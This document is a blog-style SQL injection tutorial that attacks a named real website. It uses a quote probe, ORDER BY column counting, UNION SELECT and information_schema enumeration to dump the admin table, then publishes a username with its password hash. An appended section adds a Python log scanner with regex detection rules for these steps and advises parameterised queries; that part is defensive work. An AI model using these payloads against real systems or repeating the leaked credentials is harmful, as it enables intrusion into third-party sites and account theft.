SQL Injection

 

This article is about how to hack a website with SQL injection. I and oceanofanythingg.blogspot.com take no responsibility for its misuse.

We have a target, http://www.allaboutcar.net/articles.php?topic=-3. Let's see if it is vulnerable to SQL injection. To check, put a ' at the end:
http://www.allaboutcar.net/articles.php?topic=3'
It gives a MySQL database error, which means it is vulnerable to SQL injection. OK, let's get the number of columns. To do that you need the command "order by": put it at the end with an increasing count.
For example:
http://www.allaboutcar.net/articles.php?topic=3 order by 1--
http://www.allaboutcar.net/articles.php?topic=3 order by 2--
http://www.allaboutcar.net/articles.php?topic=3 order by 3--

Do that until you get an error.

It gives an error on http://www.allaboutcar.net/articles.php?topic=3 order by 6--

That means it only has 5 columns, because it didn't give an error on
http://www.allaboutcar.net/articles.php?topic=3 order by 5--
...
OK, let's do the union.
To do this you need to use the command "union select":

http://www.allaboutcar.net/articles.php?topic=-3 union select 1,2,3,4,5--

Like that.

A number should pop up somewhere on the page.

We got number 2 popped, so let's inject into position 2.
First we need to check the database version: if it is 5, we continue; if it is version 4, you have to guess the tables and columns. To check the database version use "@@version" or "version()". Here it is version 5:

5.0.67

OK, now let's get the table names. To do that you need to use these:

group_concat(table_name)
information_schema.tables

We put the following because we need the tables of the default database:
where table_schema=database()--

We have the list of tables now:

http://www.allaboutcar.net/articles.php?topic=-3 union select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema=database()--

OK, now we got these tables:

Admins,articles,ban,banners,banners_info,comments,file_categories,file_data,forum_a,forum_b,forum_c,gbook,infopages,jp_users,links_categories,links_data,mails,menu,news,poll_data,poll_desc,pw,topic,users

OK, we have the admin table here. Let's get the columns now. To do that just change this:
http://www.allaboutcar.net/articles.php?topic=-3 union select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema=database()--

to
http://www.allaboutcar.net/articles.php?topic=-3 union select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_schema=database()--

Now we have the columns:

id,nick,pass,name,added,access,mail,stat,id,date,title,text,opened,comments,discript,topic,author,id,ip,date,id,title,alt,url,img,code,mode,opened,o_limit,click,date,e_date,stat,what,id,title,text,next,id,what,date,wid,name,mail,title,text,ip,id,title,text,pos,opened,stat,id,category,title,text,link,date,pass,mail,opened,bad,stat,size,id,

Now let's put this together!

Table: admins
Columns: id,nick,pass,

In this we asked for the data in those columns from the admins table:
http://www.allaboutcar.net/articles.php?topic=-3 union select 1,group_concat(id,0x3a,nick,0x3a,pass),3,4,5 from admins--
Now we have the id, nick and password hash. You need to use an MD5 cracker to crack this password.

So friends, that's all for this tutorial.
Username : MaTySeK,
Password Hash: 9dc1fc60fcd6bb1a10b9d97e64cdc253
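
Seen from the server side, the sequence of requests above leaves a recognisable trail in the web access log. The following is an added example, not code from the original post, that flags that trail; the rule names, the log format and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Rule names are labels chosen for this example. Each pattern matches one
# step of the sequence in the article, applied to URL-decoded parameter values.
RULES = [
    ("quote_probe", re.compile(r"'\s*$")),
    ("order_by_probe", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union_select", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("version_probe", re.compile(r"@@version|\bversion\s*\(", re.I)),
    ("schema_enum", re.compile(r"\binformation_schema\.(tables|columns)\b", re.I)),
    ("group_concat", re.compile(r"\bgroup_concat\s*\(", re.I)),
    ("sql_comment", re.compile(r"--\s*$")),
]
# Common log format: client IP first, request line in double quotes.
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*"')

# Constructed sample lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /articles.php?topic=3 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2024:10:00:02 +0000] "GET /search.php?q=o%27brien HTTP/1.1" 200 901',
    '203.0.113.9 - - [01/Jan/2024:10:00:09 +0000] "GET /articles.php?topic=3%27 HTTP/1.1" 200 312',
    '203.0.113.9 - - [01/Jan/2024:10:00:15 +0000] "GET /articles.php?topic=3%20order%20by%206-- HTTP/1.1" 200 298',
    '203.0.113.9 - - [01/Jan/2024:10:00:31 +0000] "GET /articles.php?topic=-3%20union%20select%201,'
    'group_concat(table_name),3,4,5%20from%20information_schema.tables%20where%20table_schema=database()--'
    ' HTTP/1.1" 200 2210',
]

def match_rules(target):
    """Return the sorted rule names that fire on any query parameter value."""
    hits = set()
    for _, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        hits.update(name for name, rx in RULES if rx.search(value))
    return sorted(hits)

def scan(lines):
    """Map client IP -> set of rule names seen across all of its requests."""
    per_ip = {}
    for line in lines:
        m = LOG_LINE.match(line)
        if m and (hits := match_rules(m.group(2))):
            per_ip.setdefault(m.group(1), set()).update(hits)
    return per_ip

def suspects(lines, min_rules=2):
    """IPs whose requests triggered at least min_rules distinct rules."""
    return sorted(ip for ip, hits in scan(lines).items() if len(hits) >= min_rules)

if __name__ == "__main__":
    for ip, hits in scan(SAMPLE_LOG).items():
        print(ip, sorted(hits))
```

Detection of this kind complements the fix and does not replace it: the `topic` value should be validated as an integer and bound as a parameter in a prepared statement, so that none of the requests above change the query.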
